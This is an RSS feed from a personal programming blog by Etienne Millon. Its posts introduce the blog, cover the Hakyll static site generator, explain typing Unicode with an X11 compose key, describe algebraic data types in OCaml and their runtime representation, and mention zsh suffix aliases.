<?xml version="1.0" encoding="utf-8"?>
<rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom"
    xmlns:dc="http://purl.org/dc/elements/1.1/">
    <channel>
        <title>Enter the void *</title>
        <link>http://blog.emillon.org</link>
        <description><![CDATA[Yet another random hacker]]></description>
        <atom:link href="http://blog.emillon.org/rss.xml" rel="self"
                   type="application/rss+xml" />
        <lastBuildDate>Fri, 11 Nov 2011 00:00:00 UT</lastBuildDate>
        <item>
    <title>Hello, world !</title>
    <link>http://blog.emillon.org/posts/2011-11-11-hello-world.html</link>
    <description><![CDATA[<div class="sourceCode" id="cb1"><pre class="sourceCode haskell"><code class="sourceCode haskell"><span id="cb1-1"><a href="#cb1-1" aria-hidden="true" tabindex="-1"></a><span class="ot">blog ::</span> <span class="dt">IO</span> ()</span>
<span id="cb1-2"><a href="#cb1-2" aria-hidden="true" tabindex="-1"></a>blog <span class="ot">=</span></span>
<span id="cb1-3"><a href="#cb1-3" aria-hidden="true" tabindex="-1"></a>  <span class="fu">putStrLn</span> <span class="st">&quot;Hello, world !&quot;</span></span></code></pre></div>
<p>This is my first attempt at blogging, I still don’t know what to expect.
I will probably write about the following topics :</p>
<ul>
<li>Programming, especially using <a href="http://caml.inria.fr/">functional</a> <a href="http://www.haskell.org/">languages</a>.</li>
<li>Development of the <a href="http://www.debian.org/">Debian</a> operating system.</li>
<li><a href="http://en.wikipedia.org/wiki/Static_program_analysis">Static analysis</a> of software.</li>
<li>Computer security.</li>
</ul>
<p>Like some of <a href="http://blog.chmd.fr/going-static.html">my</a> <a href="http://nicdumz.fr/blog/2010/12/why-blogofile/">friends</a>, I decided to use a
static blog generator. The first series of posts will be about setting this up
with <a href="http://jaspervdj.be/hakyll/">hakyll</a>, git and S3. Stay tuned !</p>]]></description>
    <pubDate>Fri, 11 Nov 2011 00:00:00 UT</pubDate>
    <guid>http://blog.emillon.org/posts/2011-11-11-hello-world.html</guid>
    <dc:creator>Etienne Millon</dc:creator>
</item>
<item>
    <title>Hakyll 101</title>
    <link>http://blog.emillon.org/posts/2011-11-21-hakyll-101.html</link>
    <description><![CDATA[<p>So, the recent trend seems to be static blogging. Indeed, as a web application,
a blog is mostly read-only. By generating static <code>.html</code> files, one can
eliminate :</p>
<ul>
<li>CPU load : static content is what’s easiest to serve, especially with modern
servers using <a href="http://manpages.debian.org/cgi-bin/man.cgi?query=sendfile&amp;sektion=2&amp;apropos=0&amp;manpath=Debian%206.0%20squeeze">sendfile(2)</a>.</li>
<li>security issues : without dynamic page generation, the attack surface is
also vastly reduced. Authentication is moved from a PHP or Python script to
the Unix way.</li>
<li>deployment problems : I don’t know a free host that won’t serve static
files. I use <a href="http://aws.amazon.com/s3/">S3</a> (and the free tier will often be enough !) but if I am not
satisfied, it’s dead simple to migrate.</li>
</ul>
<p>Basically, it’s like moving from a dynamic language to a static one ☺. The only
problem is if you want to add comments. The popular solution is <a href="https://disqus.com">Disqus</a> but it
is unfortunately a non-free application. I’ll probably stick to it but I fear
data lock-in.</p>
<p>As it is fashionable, a <em>lot</em> of tools have appeared : <a href="https://github.com/ametaireau/pelican/">pelican</a>, <a href="http://blogofile.com/">blogofile</a>,
<a href="http://ikiwiki.info/">ikiwiki</a>, <a href="http://jekyllrb.com/">jekyll</a>… Being a haskeller, I decided to give <a href="http://jaspervdj.be/hakyll/">hakyll</a> a try.</p>
<p>Hakyll is a haskell library for writing and deploying static websites ; that’s about
it. As in a dynamic application, you define routes and how to serve them :</p>
<div class="sourceCode" id="cb1"><pre class="sourceCode haskell"><code class="sourceCode haskell"><span id="cb1-1"><a href="#cb1-1" aria-hidden="true" tabindex="-1"></a><span class="ot">makeCss ::</span> <span class="dt">Rules</span></span>
<span id="cb1-2"><a href="#cb1-2" aria-hidden="true" tabindex="-1"></a>makeCss <span class="ot">=</span></span>
<span id="cb1-3"><a href="#cb1-3" aria-hidden="true" tabindex="-1"></a>  void <span class="op">$</span> match <span class="st">&quot;css/*&quot;</span> <span class="op">$</span> <span class="kw">do</span></span>
<span id="cb1-4"><a href="#cb1-4" aria-hidden="true" tabindex="-1"></a>      route   idRoute</span>
<span id="cb1-5"><a href="#cb1-5" aria-hidden="true" tabindex="-1"></a>      compile compressCssCompiler</span></code></pre></div>
<p>Most rules consist of compiling <a href="http://daringfireball.net/projects/markdown/">markdown</a> to HTML (with the fantastic <a href="http://johnmacfarlane.net/pandoc/">pandoc</a>
library) and copying stuff around.</p>
<p>The resulting binary, when compiled, can be run to see previews, build files or
even deploy the site.</p>
<pre><code> ~/www/blog [master] % ./blog
ABOUT

This is a Hakyll site generator program. You should always
run it from the project root directory.

USAGE

blog build           Generate the site
blog clean           Clean up and remove cache
blog help            Show this message
blog preview [port]  Run a server and autocompile
blog rebuild         Clean up and build again
blog server [port]   Run a local test server
blog deploy          Upload/deploy your site</code></pre>
<p>So far I’ve found it very easy to use. That’s it for this first mini-tour. Stay
tuned !</p>]]></description>
    <pubDate>Mon, 21 Nov 2011 00:00:00 UT</pubDate>
    <guid>http://blog.emillon.org/posts/2011-11-21-hakyll-101.html</guid>
    <dc:creator>Etienne Millon</dc:creator>
</item>
<item>
    <title>Unicode : Math, greek, symbols - you name it !</title>
    <link>http://blog.emillon.org/posts/2011-11-28-unicode-math-greek-symbols-you-name-it.html</link>
    <description><![CDATA[<h2 id="ebcdic-ascii-the-power-of-legacy">EBCDIC, ASCII &amp; the power of legacy</h2>
<p>… and no, that’s not a movie title.</p>
<p>As you know, all your computer knows about is numbers, yet when you type on a
keyboard, a character appears on your screen. This is thanks to character
encodings.</p>
<p>There are several norms that defines how characters (ie, glyphs) are encoded
into numbers. Besides dinosaurs such as <a href="https://en.wikipedia.org/wiki/EBCDIC">EBCDIC</a>, the “classic” way of encoding
is <a href="https://en.wikipedia.org/wiki/ASCII">ASCII</a> – that is what most modern<a href="#fn1" class="footnote-ref" id="fnref1" role="doc-noteref"><sup>1</sup></a> operating systems use internally.</p>
<p>The problem with ASCII is that it maps every character to a single byte with
<a href="https://en.wikipedia.org/wiki/Most_significant_bit">MSB</a> reset, meaning that you can have a maximum of 128 glyphs. It’s “good
enough” for English (hey, the A stands for American) but terrible for
international characters. This is even worse considering that 32 of them are
control characters, ie mostly legacy. Did you ever need to interpret <code>DC2</code>, <code>SI</code>
or <code>GS</code> in a program ?</p>
<p>The eighth bit being “reserved” can be used to support “extended characters”.
Several vendors (including Microsoft) used the concept of “code pages” to use
extra glyphs in the 128-255 range. For example, Latin-1 was used in western
europe to display accentuated characters.</p>
<p>If all your data comes from one part of the world, it works fine, but with the
following limitations if you need to handle international data :</p>
<ul>
<li>it becomes necessary to have metadata specifying which codepage has to be
used.</li>
<li>you have to choose exactly one codepage per document.</li>
</ul>
<p>In other words, a more extensible system is needed. Hopefully, this system
exists and is called…</p>
<h2 id="unicode">Unicode</h2>
<p>Unicode separates two notions :</p>
<ul>
<li>what is a character. Unicode include a large collection of glyph names.
For example, version 6.0 includes 109449 characters.</li>
<li>how a character is encoded as bytes. More precisely, this is the role of
encodings such as <a href="https://en.wikipedia.org/wiki/UTF-8">UTF-8</a>. Usually, they are compatible with ASCII (the byte
representation coincides on characters 0-127).</li>
</ul>
<p>What’s nice is that it’s easy to enter Unicode under X11. The last two sections
explain how you can configure your system to type (for example) √, β and ✈ !</p>
<h2 id="configure-a-compose-key">Configure a compose key</h2>
<p>A “compose” key, or <code>Multi_key</code> under X11, will begin a character compose
sequence. For example, when I type <code>&lt;Multi_key&gt; &lt;s&gt; &lt;q&gt;</code>, a square root
(U+221A √) is entered.</p>
<p>To configure a compose key, you can use <a href="http://manpages.debian.org/cgi-bin/man.cgi?query=xmodmap&amp;sektion=1">xmodmap(1)</a>. Put the following into
<code>~/.Xmodmap</code> to make your right control key act as a <code>Multi_key</code> :</p>
<pre><code>keysym Control_R = Multi_key</code></pre>
<p>Unfortunately, this file is not loaded automatically, so you have to run
<code>xmodmap ~/.Xmodmap</code> when opening a X session (this can be done automatically if
you put in in your <code>~/.xsession</code>, for example).</p>
<h2 id="define-a-.xcompose-mapping">Define a .XCompose mapping</h2>
<p>The second part is to define mappings between key sequences and unicode
codepoints. This is the role of the <code>~/.XCompose</code> file.</p>
<p>As described in <a href="http://manpages.ubuntu.com/manpages/precise/en/man5/XCompose.5.html">xcompose(5)</a>, a line looks like :</p>
<pre><code>&lt;Multi_key&gt; &lt;ampersand&gt; &lt;p&gt; &lt;l&gt; &lt;a&gt; &lt;n&gt; &lt;e&gt;     : &quot;✈&quot;   U2708     # AIRPLANE</code></pre>
<p>ie, a key sequence, a colon, a string and a character name. The comment does not
hurt, as usual.</p>
<p>To start your own list of bindings, I suggest <a href="https://github.com/kragen/xcompose">kragen’s
repository</a>, which includes an excellent
set. And if you need to find a specific unicode character, the
<a href="http://kassiopeia.juls.savba.sk/~garabik/software/unicode/">unicode</a> script is
very useful !</p>
<p><strong>TL;DR:</strong> Spread the word, ♥ Unicode ☺</p>
<section id="footnotes" class="footnotes footnotes-end-of-document" role="doc-endnotes">
<hr />
<ol>
<li id="fn1"><p>Yes, that excludes AS/400.<a href="#fnref1" class="footnote-back" role="doc-backlink">↩︎</a></p></li>
</ol>
</section>]]></description>
    <pubDate>Mon, 28 Nov 2011 00:00:00 UT</pubDate>
    <guid>http://blog.emillon.org/posts/2011-11-28-unicode-math-greek-symbols-you-name-it.html</guid>
    <dc:creator>Etienne Millon</dc:creator>
</item>
<item>
    <title>What's in an ADT ?</title>
    <link>http://blog.emillon.org/posts/2011-12-14-what-s-in-an-adt.html</link>
    <description><![CDATA[<h2 id="introduction">Introduction</h2>
<p>Algebraic Data Types, or ADTs for short, are a core feature of functional
languages such as OCaml or Haskell. They are a handy model of closed disjoint
unions and unfortunately, outside of the functional realm, they are only seldom
used.</p>
<p>In this article, I will explain what ADTs are, how they are used in OCaml and
what trimmed-down versions of them exist in other languages. I will use OCaml,
but the big picture is about the same in Haskell.</p>
<h2 id="principles">Principles</h2>
<p>Functional languages offer a myriad of types for the programmer.</p>
<ul>
<li>some <em>base</em> types, such as <code>int</code>, <code>char</code> or <code>bool</code>.</li>
<li>functions, ie <em>arrow</em> types. A function with domain <code>a</code> and codomain <code>b</code> has
type <code>a -&gt; b</code>.</li>
<li>tuples, ie <em>product</em> types. A tuple is an heterogeneous, fixed-width
container type (its set-theoretic counterpart is the cartesian product) For
example, <code>(2, true, 'x')</code> has type <code>int * bool * char</code>. <em>record</em> types are a
(mostly) syntactic extension to give name to their fields.</li>
<li>some <em>parametric</em> types. For example, if <code>t</code> is a type, <code>t list</code> is the type
of homogeneous linked list of elements having type <code>t</code>.</li>
<li>what we are talking about today, <em>algebraic</em> types (or <em>sum</em> types, or
<em>variant</em> types).</li>
</ul>
<p>If product types represent the cartesian product, algebraic types represent the
disjoint union. In another words, they are very adapted for a case
analysis.</p>
<p>We will take the example of integer ranges. One can say that an integer range is
either :</p>
<ul>
<li>the empty range</li>
<li>of the form <code>]-∞;a]</code></li>
<li>of the form <code>[a;+∞[</code></li>
<li>an interval of the form <code>[a;b]</code> (where a ≤ b)</li>
<li>the whole range (ie, ℤ)</li>
</ul>
<p>With the following properties :</p>
<ul>
<li>Disjunction : no range can be of two forms at a time.</li>
<li>Injectivity : if <code>[a;b]</code> = <code>[c;d]</code>, then <code>a</code> = <code>c</code> and <code>b</code> = <code>d</code> (and
similarly for other forms).</li>
<li>Exhaustiveness : it cannot be of another form.</li>
</ul>
<h2 id="syntax-semantics">Syntax &amp; semantics</h2>
<p>This can be encoded as an ADT :</p>
<div class="sourceCode" id="cb1"><pre class="sourceCode ocaml"><code class="sourceCode ocaml"><span id="cb1-1"><a href="#cb1-1" aria-hidden="true" tabindex="-1"></a><span class="kw">type</span> range =</span>
<span id="cb1-2"><a href="#cb1-2" aria-hidden="true" tabindex="-1"></a>  | Empty</span>
<span id="cb1-3"><a href="#cb1-3" aria-hidden="true" tabindex="-1"></a>  | HalfLeft <span class="kw">of</span> <span class="dt">int</span></span>
<span id="cb1-4"><a href="#cb1-4" aria-hidden="true" tabindex="-1"></a>  | HalfRight <span class="kw">of</span> <span class="dt">int</span></span>
<span id="cb1-5"><a href="#cb1-5" aria-hidden="true" tabindex="-1"></a>  | Range <span class="kw">of</span> <span class="dt">int</span> * <span class="dt">int</span></span>
<span id="cb1-6"><a href="#cb1-6" aria-hidden="true" tabindex="-1"></a>  | FullRange</span></code></pre></div>
<p><code>Empty</code>, <code>HalfLeft</code>, <code>HalfRight</code>, <code>Range</code> and <code>FullRange</code> are <code>t</code>’s
<em>constructors</em>. They are the only way to build a value of type <code>t</code>. For example,
<code>Empty</code>, <code>HalfLeft 3</code> and <code>Range (2, 5)</code> are all values of type <code>t</code><a href="#fn1" class="footnote-ref" id="fnref1" role="doc-noteref"><sup>1</sup></a>. They
each have a specific <em>arity</em> (the number of arguments they take).</p>
<p>To <em>deconstruct</em> a value of type <code>t</code>, we have to use a powerful construct,
<em>pattern matching</em>, which is about matching a value against a sequence of
patterns (yes, that’s about it).</p>
<p>To illustrate this, we will write a function that computes the minimum value of
such a range. Of course, this can be ±∞ too, so we have to define a type to
represent the return value.</p>
<div class="sourceCode" id="cb2"><pre class="sourceCode ocaml"><code class="sourceCode ocaml"><span id="cb2-1"><a href="#cb2-1" aria-hidden="true" tabindex="-1"></a><span class="kw">type</span> ext_int =</span>
<span id="cb2-2"><a href="#cb2-2" aria-hidden="true" tabindex="-1"></a>  | MinusInfinity</span>
<span id="cb2-3"><a href="#cb2-3" aria-hidden="true" tabindex="-1"></a>  | Finite <span class="kw">of</span> <span class="dt">int</span></span>
<span id="cb2-4"><a href="#cb2-4" aria-hidden="true" tabindex="-1"></a>  | PlusInfinity</span></code></pre></div>
<p>In a math textbook, we would write the case analysis as :</p>
<ul>
<li>min ∅ = +∞</li>
<li>min ]-∞;a] = -∞</li>
<li>min [a;+∞[ = a</li>
<li>min [a;b] = a</li>
<li>min ℤ = -∞</li>
</ul>
<p>That translates to the following (executable !) OCaml code :</p>
<div class="sourceCode" id="cb3"><pre class="sourceCode ocaml"><code class="sourceCode ocaml"><span id="cb3-1"><a href="#cb3-1" aria-hidden="true" tabindex="-1"></a><span class="kw">let</span> range_min x =</span>
<span id="cb3-2"><a href="#cb3-2" aria-hidden="true" tabindex="-1"></a>  <span class="kw">match</span> x <span class="kw">with</span></span>
<span id="cb3-3"><a href="#cb3-3" aria-hidden="true" tabindex="-1"></a>  | Empty -&gt; PlusInfinity</span>
<span id="cb3-4"><a href="#cb3-4" aria-hidden="true" tabindex="-1"></a>  | HalfLeft a -&gt; MinusInfinity</span>
<span id="cb3-5"><a href="#cb3-5" aria-hidden="true" tabindex="-1"></a>  | HalfRight a -&gt; Finite a</span>
<span id="cb3-6"><a href="#cb3-6" aria-hidden="true" tabindex="-1"></a>  | Range (a, b) -&gt; Finite a</span>
<span id="cb3-7"><a href="#cb3-7" aria-hidden="true" tabindex="-1"></a>  | FullRange -&gt; MinusInfinity</span></code></pre></div>
<p>In the pattern <code>HalfLeft a</code>, <code>a</code> is a variable name, so it get bounds to the
argument’s value. In other words, <code>match (HalfLeft 2) with HalfLeft x -&gt; e</code>
bounds <code>x</code> to 2 in <code>e</code>.</p>
<h2 id="its-functions-all-the-way-down">It’s functions all the way down</h2>
<p>Pattern matching seems magical at first, but it is only a syntactic trick.
Indeed, the definition of the above type is equivalent to the following
definition :</p>
<div class="sourceCode" id="cb4"><pre class="sourceCode ocaml"><code class="sourceCode ocaml"><span id="cb4-1"><a href="#cb4-1" aria-hidden="true" tabindex="-1"></a><span class="kw">type</span> range</span>
<span id="cb4-2"><a href="#cb4-2" aria-hidden="true" tabindex="-1"></a></span>
<span id="cb4-3"><a href="#cb4-3" aria-hidden="true" tabindex="-1"></a><span class="co">(* The following is not syntactically correct *)</span></span>
<span id="cb4-4"><a href="#cb4-4" aria-hidden="true" tabindex="-1"></a><span class="kw">val</span> Empty : range</span>
<span id="cb4-5"><a href="#cb4-5" aria-hidden="true" tabindex="-1"></a><span class="kw">val</span> HalfLeft : <span class="dt">int</span> -&gt; range</span>
<span id="cb4-6"><a href="#cb4-6" aria-hidden="true" tabindex="-1"></a><span class="kw">val</span> HalfRight : <span class="dt">int</span> -&gt; range</span>
<span id="cb4-7"><a href="#cb4-7" aria-hidden="true" tabindex="-1"></a><span class="kw">val</span> Range : <span class="dt">int</span> * <span class="dt">int</span> -&gt; range</span>
<span id="cb4-8"><a href="#cb4-8" aria-hidden="true" tabindex="-1"></a><span class="kw">val</span> FullRange : range</span>
<span id="cb4-9"><a href="#cb4-9" aria-hidden="true" tabindex="-1"></a><span class="co">(* Moreover, we know that they are injective and mutually disjoint *)</span></span>
<span id="cb4-10"><a href="#cb4-10" aria-hidden="true" tabindex="-1"></a></span>
<span id="cb4-11"><a href="#cb4-11" aria-hidden="true" tabindex="-1"></a><span class="kw">val</span> deconstruct_range :</span>
<span id="cb4-12"><a href="#cb4-12" aria-hidden="true" tabindex="-1"></a>  (<span class="dt">unit</span> -&gt; &#39;a) -&gt;</span>
<span id="cb4-13"><a href="#cb4-13" aria-hidden="true" tabindex="-1"></a>  (<span class="dt">int</span> -&gt; &#39;a) -&gt;</span>
<span id="cb4-14"><a href="#cb4-14" aria-hidden="true" tabindex="-1"></a>  (<span class="dt">int</span> -&gt; &#39;a) -&gt;</span>
<span id="cb4-15"><a href="#cb4-15" aria-hidden="true" tabindex="-1"></a>  (<span class="dt">int</span> * <span class="dt">int</span> -&gt; &#39;a) -&gt;</span>
<span id="cb4-16"><a href="#cb4-16" aria-hidden="true" tabindex="-1"></a>  (<span class="dt">unit</span> -&gt; &#39;a) -&gt;</span>
<span id="cb4-17"><a href="#cb4-17" aria-hidden="true" tabindex="-1"></a>  range -&gt;</span>
<span id="cb4-18"><a href="#cb4-18" aria-hidden="true" tabindex="-1"></a>  &#39;a</span></code></pre></div>
<p><code>deconstruct_range</code> is what replaces pattern matching. It also embodies the notion of
exhaustiveness, because given any value of type <code>range</code>, we can build a
deconstructed value out of it.</p>
<p>Its type looks scary at first, but if we look closer, its arguments are a
sequence of case-specific deconstructors<a href="#fn2" class="footnote-ref" id="fnref2" role="doc-noteref"><sup>2</sup></a> and the value to get “matched”
against.</p>
<p>To show the equivalence, we can implement <code>deconstruct_range</code> using pattern
patching and <code>range_min</code> using <code>deconstruct_range</code><a href="#fn3" class="footnote-ref" id="fnref3" role="doc-noteref"><sup>3</sup></a> :</p>
<div class="sourceCode" id="cb5"><pre class="sourceCode ocaml"><code class="sourceCode ocaml"><span id="cb5-1"><a href="#cb5-1" aria-hidden="true" tabindex="-1"></a><span class="kw">let</span> deconstruct_range</span>
<span id="cb5-2"><a href="#cb5-2" aria-hidden="true" tabindex="-1"></a>      f_empty</span>
<span id="cb5-3"><a href="#cb5-3" aria-hidden="true" tabindex="-1"></a>      f_halfleft</span>
<span id="cb5-4"><a href="#cb5-4" aria-hidden="true" tabindex="-1"></a>      f_halfright</span>
<span id="cb5-5"><a href="#cb5-5" aria-hidden="true" tabindex="-1"></a>      f_range</span>
<span id="cb5-6"><a href="#cb5-6" aria-hidden="true" tabindex="-1"></a>      f_fullrange</span>
<span id="cb5-7"><a href="#cb5-7" aria-hidden="true" tabindex="-1"></a>      x</span>
<span id="cb5-8"><a href="#cb5-8" aria-hidden="true" tabindex="-1"></a>    =</span>
<span id="cb5-9"><a href="#cb5-9" aria-hidden="true" tabindex="-1"></a>  <span class="kw">match</span> x <span class="kw">with</span></span>
<span id="cb5-10"><a href="#cb5-10" aria-hidden="true" tabindex="-1"></a>  | Empty -&gt; f_empty ()</span>
<span id="cb5-11"><a href="#cb5-11" aria-hidden="true" tabindex="-1"></a>  | HalfLeft a -&gt; f_halfleft a</span>
<span id="cb5-12"><a href="#cb5-12" aria-hidden="true" tabindex="-1"></a>  | HalfRight a -&gt; f_halfright a</span>
<span id="cb5-13"><a href="#cb5-13" aria-hidden="true" tabindex="-1"></a>  | Range (a, b) -&gt; f_range (a, b)</span>
<span id="cb5-14"><a href="#cb5-14" aria-hidden="true" tabindex="-1"></a>  | FullRange -&gt; f_fullrange ()</span></code></pre></div>
<div class="sourceCode" id="cb6"><pre class="sourceCode ocaml"><code class="sourceCode ocaml"><span id="cb6-1"><a href="#cb6-1" aria-hidden="true" tabindex="-1"></a><span class="kw">let</span> range_min&#39; x =</span>
<span id="cb6-2"><a href="#cb6-2" aria-hidden="true" tabindex="-1"></a>  deconstruct_range</span>
<span id="cb6-3"><a href="#cb6-3" aria-hidden="true" tabindex="-1"></a>    (<span class="kw">fun</span> () -&gt; PlusInfinity)</span>
<span id="cb6-4"><a href="#cb6-4" aria-hidden="true" tabindex="-1"></a>    (<span class="kw">fun</span> a -&gt; MinusInfinity)</span>
<span id="cb6-5"><a href="#cb6-5" aria-hidden="true" tabindex="-1"></a>    (<span class="kw">fun</span> a -&gt; Finite a)</span>
<span id="cb6-6"><a href="#cb6-6" aria-hidden="true" tabindex="-1"></a>    (<span class="kw">fun</span> (a, b) -&gt; Finite a)</span>
<span id="cb6-7"><a href="#cb6-7" aria-hidden="true" tabindex="-1"></a>    (<span class="kw">fun</span> () -&gt; MinusInfinity)</span>
<span id="cb6-8"><a href="#cb6-8" aria-hidden="true" tabindex="-1"></a>    x</span></code></pre></div>
<h2 id="implementation">Implementation</h2>
<p>After this trip in denotational-land, let’s get back to operational-land : how
is this implemented ?</p>
<p>In OCaml, no type information exists at runtime. Everything exists with a
uniform representation and is either an integer or a pointer to a block. Each
block starts with a tag, a size and a number of fields.</p>
<p>With the <code>Obj</code> module (kids, don’t try this at home), it is possible to inspect
blocks at runtime. Let’s write a dumper for <code>range</code> value and watch outputs :</p>
<div class="sourceCode" id="cb7"><pre class="sourceCode ocaml"><code class="sourceCode ocaml"><span id="cb7-1"><a href="#cb7-1" aria-hidden="true" tabindex="-1"></a><span class="co">(* Range of integers between a and b *)</span></span>
<span id="cb7-2"><a href="#cb7-2" aria-hidden="true" tabindex="-1"></a><span class="kw">let</span> <span class="kw">rec</span> rng a b =</span>
<span id="cb7-3"><a href="#cb7-3" aria-hidden="true" tabindex="-1"></a>  <span class="kw">if</span> a &gt; b <span class="kw">then</span></span>
<span id="cb7-4"><a href="#cb7-4" aria-hidden="true" tabindex="-1"></a>    []</span>
<span id="cb7-5"><a href="#cb7-5" aria-hidden="true" tabindex="-1"></a>  <span class="kw">else</span></span>
<span id="cb7-6"><a href="#cb7-6" aria-hidden="true" tabindex="-1"></a>    a :: rng (a+<span class="dv">1</span>) b</span>
<span id="cb7-7"><a href="#cb7-7" aria-hidden="true" tabindex="-1"></a></span>
<span id="cb7-8"><a href="#cb7-8" aria-hidden="true" tabindex="-1"></a><span class="kw">let</span> view_block o =</span>
<span id="cb7-9"><a href="#cb7-9" aria-hidden="true" tabindex="-1"></a>  <span class="kw">if</span> (<span class="dt">Obj</span>.is_block o) <span class="kw">then</span></span>
<span id="cb7-10"><a href="#cb7-10" aria-hidden="true" tabindex="-1"></a>    <span class="kw">begin</span></span>
<span id="cb7-11"><a href="#cb7-11" aria-hidden="true" tabindex="-1"></a>      <span class="kw">let</span> tag = <span class="dt">Obj</span>.tag o <span class="kw">in</span></span>
<span id="cb7-12"><a href="#cb7-12" aria-hidden="true" tabindex="-1"></a>      <span class="kw">let</span> sz = <span class="dt">Obj</span>.size o <span class="kw">in</span></span>
<span id="cb7-13"><a href="#cb7-13" aria-hidden="true" tabindex="-1"></a>      <span class="kw">let</span> f n =</span>
<span id="cb7-14"><a href="#cb7-14" aria-hidden="true" tabindex="-1"></a>        <span class="kw">let</span> f = <span class="dt">Obj</span>.field o n <span class="kw">in</span></span>
<span id="cb7-15"><a href="#cb7-15" aria-hidden="true" tabindex="-1"></a>        <span class="kw">assert</span> (<span class="dt">Obj</span>.is_int f);</span>
<span id="cb7-16"><a href="#cb7-16" aria-hidden="true" tabindex="-1"></a>        <span class="dt">Obj</span>.obj f</span>
<span id="cb7-17"><a href="#cb7-17" aria-hidden="true" tabindex="-1"></a>      <span class="kw">in</span></span>
<span id="cb7-18"><a href="#cb7-18" aria-hidden="true" tabindex="-1"></a>      tag :: <span class="dt">List</span>.map f (rng <span class="dv">0</span> (sz<span class="dv">-1</span>))</span>
<span id="cb7-19"><a href="#cb7-19" aria-hidden="true" tabindex="-1"></a>    <span class="kw">end</span></span>
<span id="cb7-20"><a href="#cb7-20" aria-hidden="true" tabindex="-1"></a>  <span class="kw">else</span> <span class="kw">if</span> <span class="dt">Obj</span>.is_int o <span class="kw">then</span></span>
<span id="cb7-21"><a href="#cb7-21" aria-hidden="true" tabindex="-1"></a>    [<span class="dt">Obj</span>.obj o]</span>
<span id="cb7-22"><a href="#cb7-22" aria-hidden="true" tabindex="-1"></a>  <span class="kw">else</span></span>
<span id="cb7-23"><a href="#cb7-23" aria-hidden="true" tabindex="-1"></a>    <span class="kw">assert</span> <span class="kw">false</span></span>
<span id="cb7-24"><a href="#cb7-24" aria-hidden="true" tabindex="-1"></a></span>
<span id="cb7-25"><a href="#cb7-25" aria-hidden="true" tabindex="-1"></a><span class="kw">let</span> examples () =</span>
<span id="cb7-26"><a href="#cb7-26" aria-hidden="true" tabindex="-1"></a>  <span class="kw">let</span> p_list l =</span>
<span id="cb7-27"><a href="#cb7-27" aria-hidden="true" tabindex="-1"></a>    <span class="dt">String</span>.concat <span class="st">&quot;;&quot;</span> (<span class="dt">List</span>.map <span class="dt">string_of_int</span> l)</span>
<span id="cb7-28"><a href="#cb7-28" aria-hidden="true" tabindex="-1"></a>  <span class="kw">in</span></span>
<span id="cb7-29"><a href="#cb7-29" aria-hidden="true" tabindex="-1"></a>  <span class="kw">let</span> explore_range r =</span>
<span id="cb7-30"><a href="#cb7-30" aria-hidden="true" tabindex="-1"></a>    <span class="dt">print_endline</span> (p_list (view_block (<span class="dt">Obj</span>.repr r)))</span>
<span id="cb7-31"><a href="#cb7-31" aria-hidden="true" tabindex="-1"></a>  <span class="kw">in</span></span>
<span id="cb7-32"><a href="#cb7-32" aria-hidden="true" tabindex="-1"></a>  <span class="dt">List</span>.iter explore_range</span>
<span id="cb7-33"><a href="#cb7-33" aria-hidden="true" tabindex="-1"></a>    [ Empty</span>
<span id="cb7-34"><a href="#cb7-34" aria-hidden="true" tabindex="-1"></a>    ; HalfLeft <span class="dv">8</span></span>
<span id="cb7-35"><a href="#cb7-35" aria-hidden="true" tabindex="-1"></a>    ; HalfRight <span class="dv">13</span></span>
<span id="cb7-36"><a href="#cb7-36" aria-hidden="true" tabindex="-1"></a>    ; Range (<span class="dv">2</span>, <span class="dv">5</span>)</span>
<span id="cb7-37"><a href="#cb7-37" aria-hidden="true" tabindex="-1"></a>    ; FullRange</span>
<span id="cb7-38"><a href="#cb7-38" aria-hidden="true" tabindex="-1"></a>    ]</span></code></pre></div>
<p>When we run <code>examples ()</code>, it outputs :</p>
<pre><code>0
0;8
1;13
2;2;5
1</code></pre>
<p>We can see the following distinction :</p>
<ul>
<li>0-ary constructors (<code>Empty</code> and <code>FullRange</code>) are encoded are simple
integers.</li>
<li>other ones are encoded blocks with a constructor number as tag (0 for
<code>HalfLeft</code>, 1 for <code>HalfRight</code> and 2 for <code>Range</code>) and their argument list
afterwards.</li>
</ul>
<p>Thanks to this uniform representation, pattern-matching is straightforward : the
runtime system will only look at the tag number to decide which constructor has
been used, and if there are arguments to be bound, they are just after in the
same block.</p>
<h2 id="conclusion">Conclusion</h2>
<p>Algebraic Data Types are a simple model of disjoint unions, for which
case analyses are the most natural. In more mainstream languages, some
alternatives exist but they are more limited to model the same problem.</p>
<p>For example, in object-oriented languages, the Visitor pattern is the natural
way to do it. But class trees are inherently “open”, thus breaking the
exhaustivity property.</p>
<p>The closest implementation is tagged unions in C, but they require to roll your
own solution using <code>enum</code>s, <code>struct</code>s and <code>union</code>s. This also means that all
your hand-allocated blocks will have the same size.</p>
<p>Oh, and I would love to know how this problem is solved with other paradigms !</p>
<section id="footnotes" class="footnotes footnotes-end-of-document" role="doc-endnotes">
<hr />
<ol>
<li id="fn1"><p>Unfortunately, so is <code>Range (10, 2)</code>. The invariant that a ≤ b has to be
enforced by the programmer when using this constructor.<a href="#fnref1" class="footnote-back" role="doc-backlink">↩︎</a></p></li>
<li id="fn2"><p>For 0-ary constructors, the type has to be <code>unit -&gt; 'a</code> instead of <code>'a</code> to
allow side effects to happen during pattern matching.<a href="#fnref2" class="footnote-back" role="doc-backlink">↩︎</a></p></li>
<li id="fn3"><p>More precisely, we would have to show that any function written with
pattern matching can be adapted to use the deconstructor instead. I hope
that this example is general enough to get the idea.<a href="#fnref3" class="footnote-back" role="doc-backlink">↩︎</a></p></li>
</ol>
</section>]]></description>
    <pubDate>Wed, 14 Dec 2011 00:00:00 UT</pubDate>
    <guid>http://blog.emillon.org/posts/2011-12-14-what-s-in-an-adt.html</guid>
    <dc:creator>Etienne Millon</dc:creator>
</item>
<item>
    <title>ZSH suffix aliases</title>
    <link>http://blog.emillon.org/posts/2012-01-17-zsh-suffix-aliases.html</link>
    <description><![CDATA[<p>I recently changed my login shell to use <a href="http://www.zsh.org/">zsh</a> instead of the venerable <a href="http://www.gnu.org/software/bash/">bash</a>.
I am still wondering why I didn’t make the change earlier. Zsh’s infamous
slowness almost not perceptible, at least with the default configuration.</p>
<p>One cool feature present in zsh is the notion of <em>suffix alias</em> (described in
<a href="http://manpages.debian.org/cgi-bin/man.cgi?query=zshbuiltins&amp;apropos=0&amp;sektion=0&amp;manpath=Debian+7.8+wheezy&amp;format=html&amp;locale=en">zshbuiltins(1)</a>). Quick example :</p>
<pre><code>$ alias -s pdf=evince
$ filename.pdf</code></pre>
<p>… will open filename.pdf under evince, as if <code>evince filename.pdf</code> had been
typed. Handy !</p>
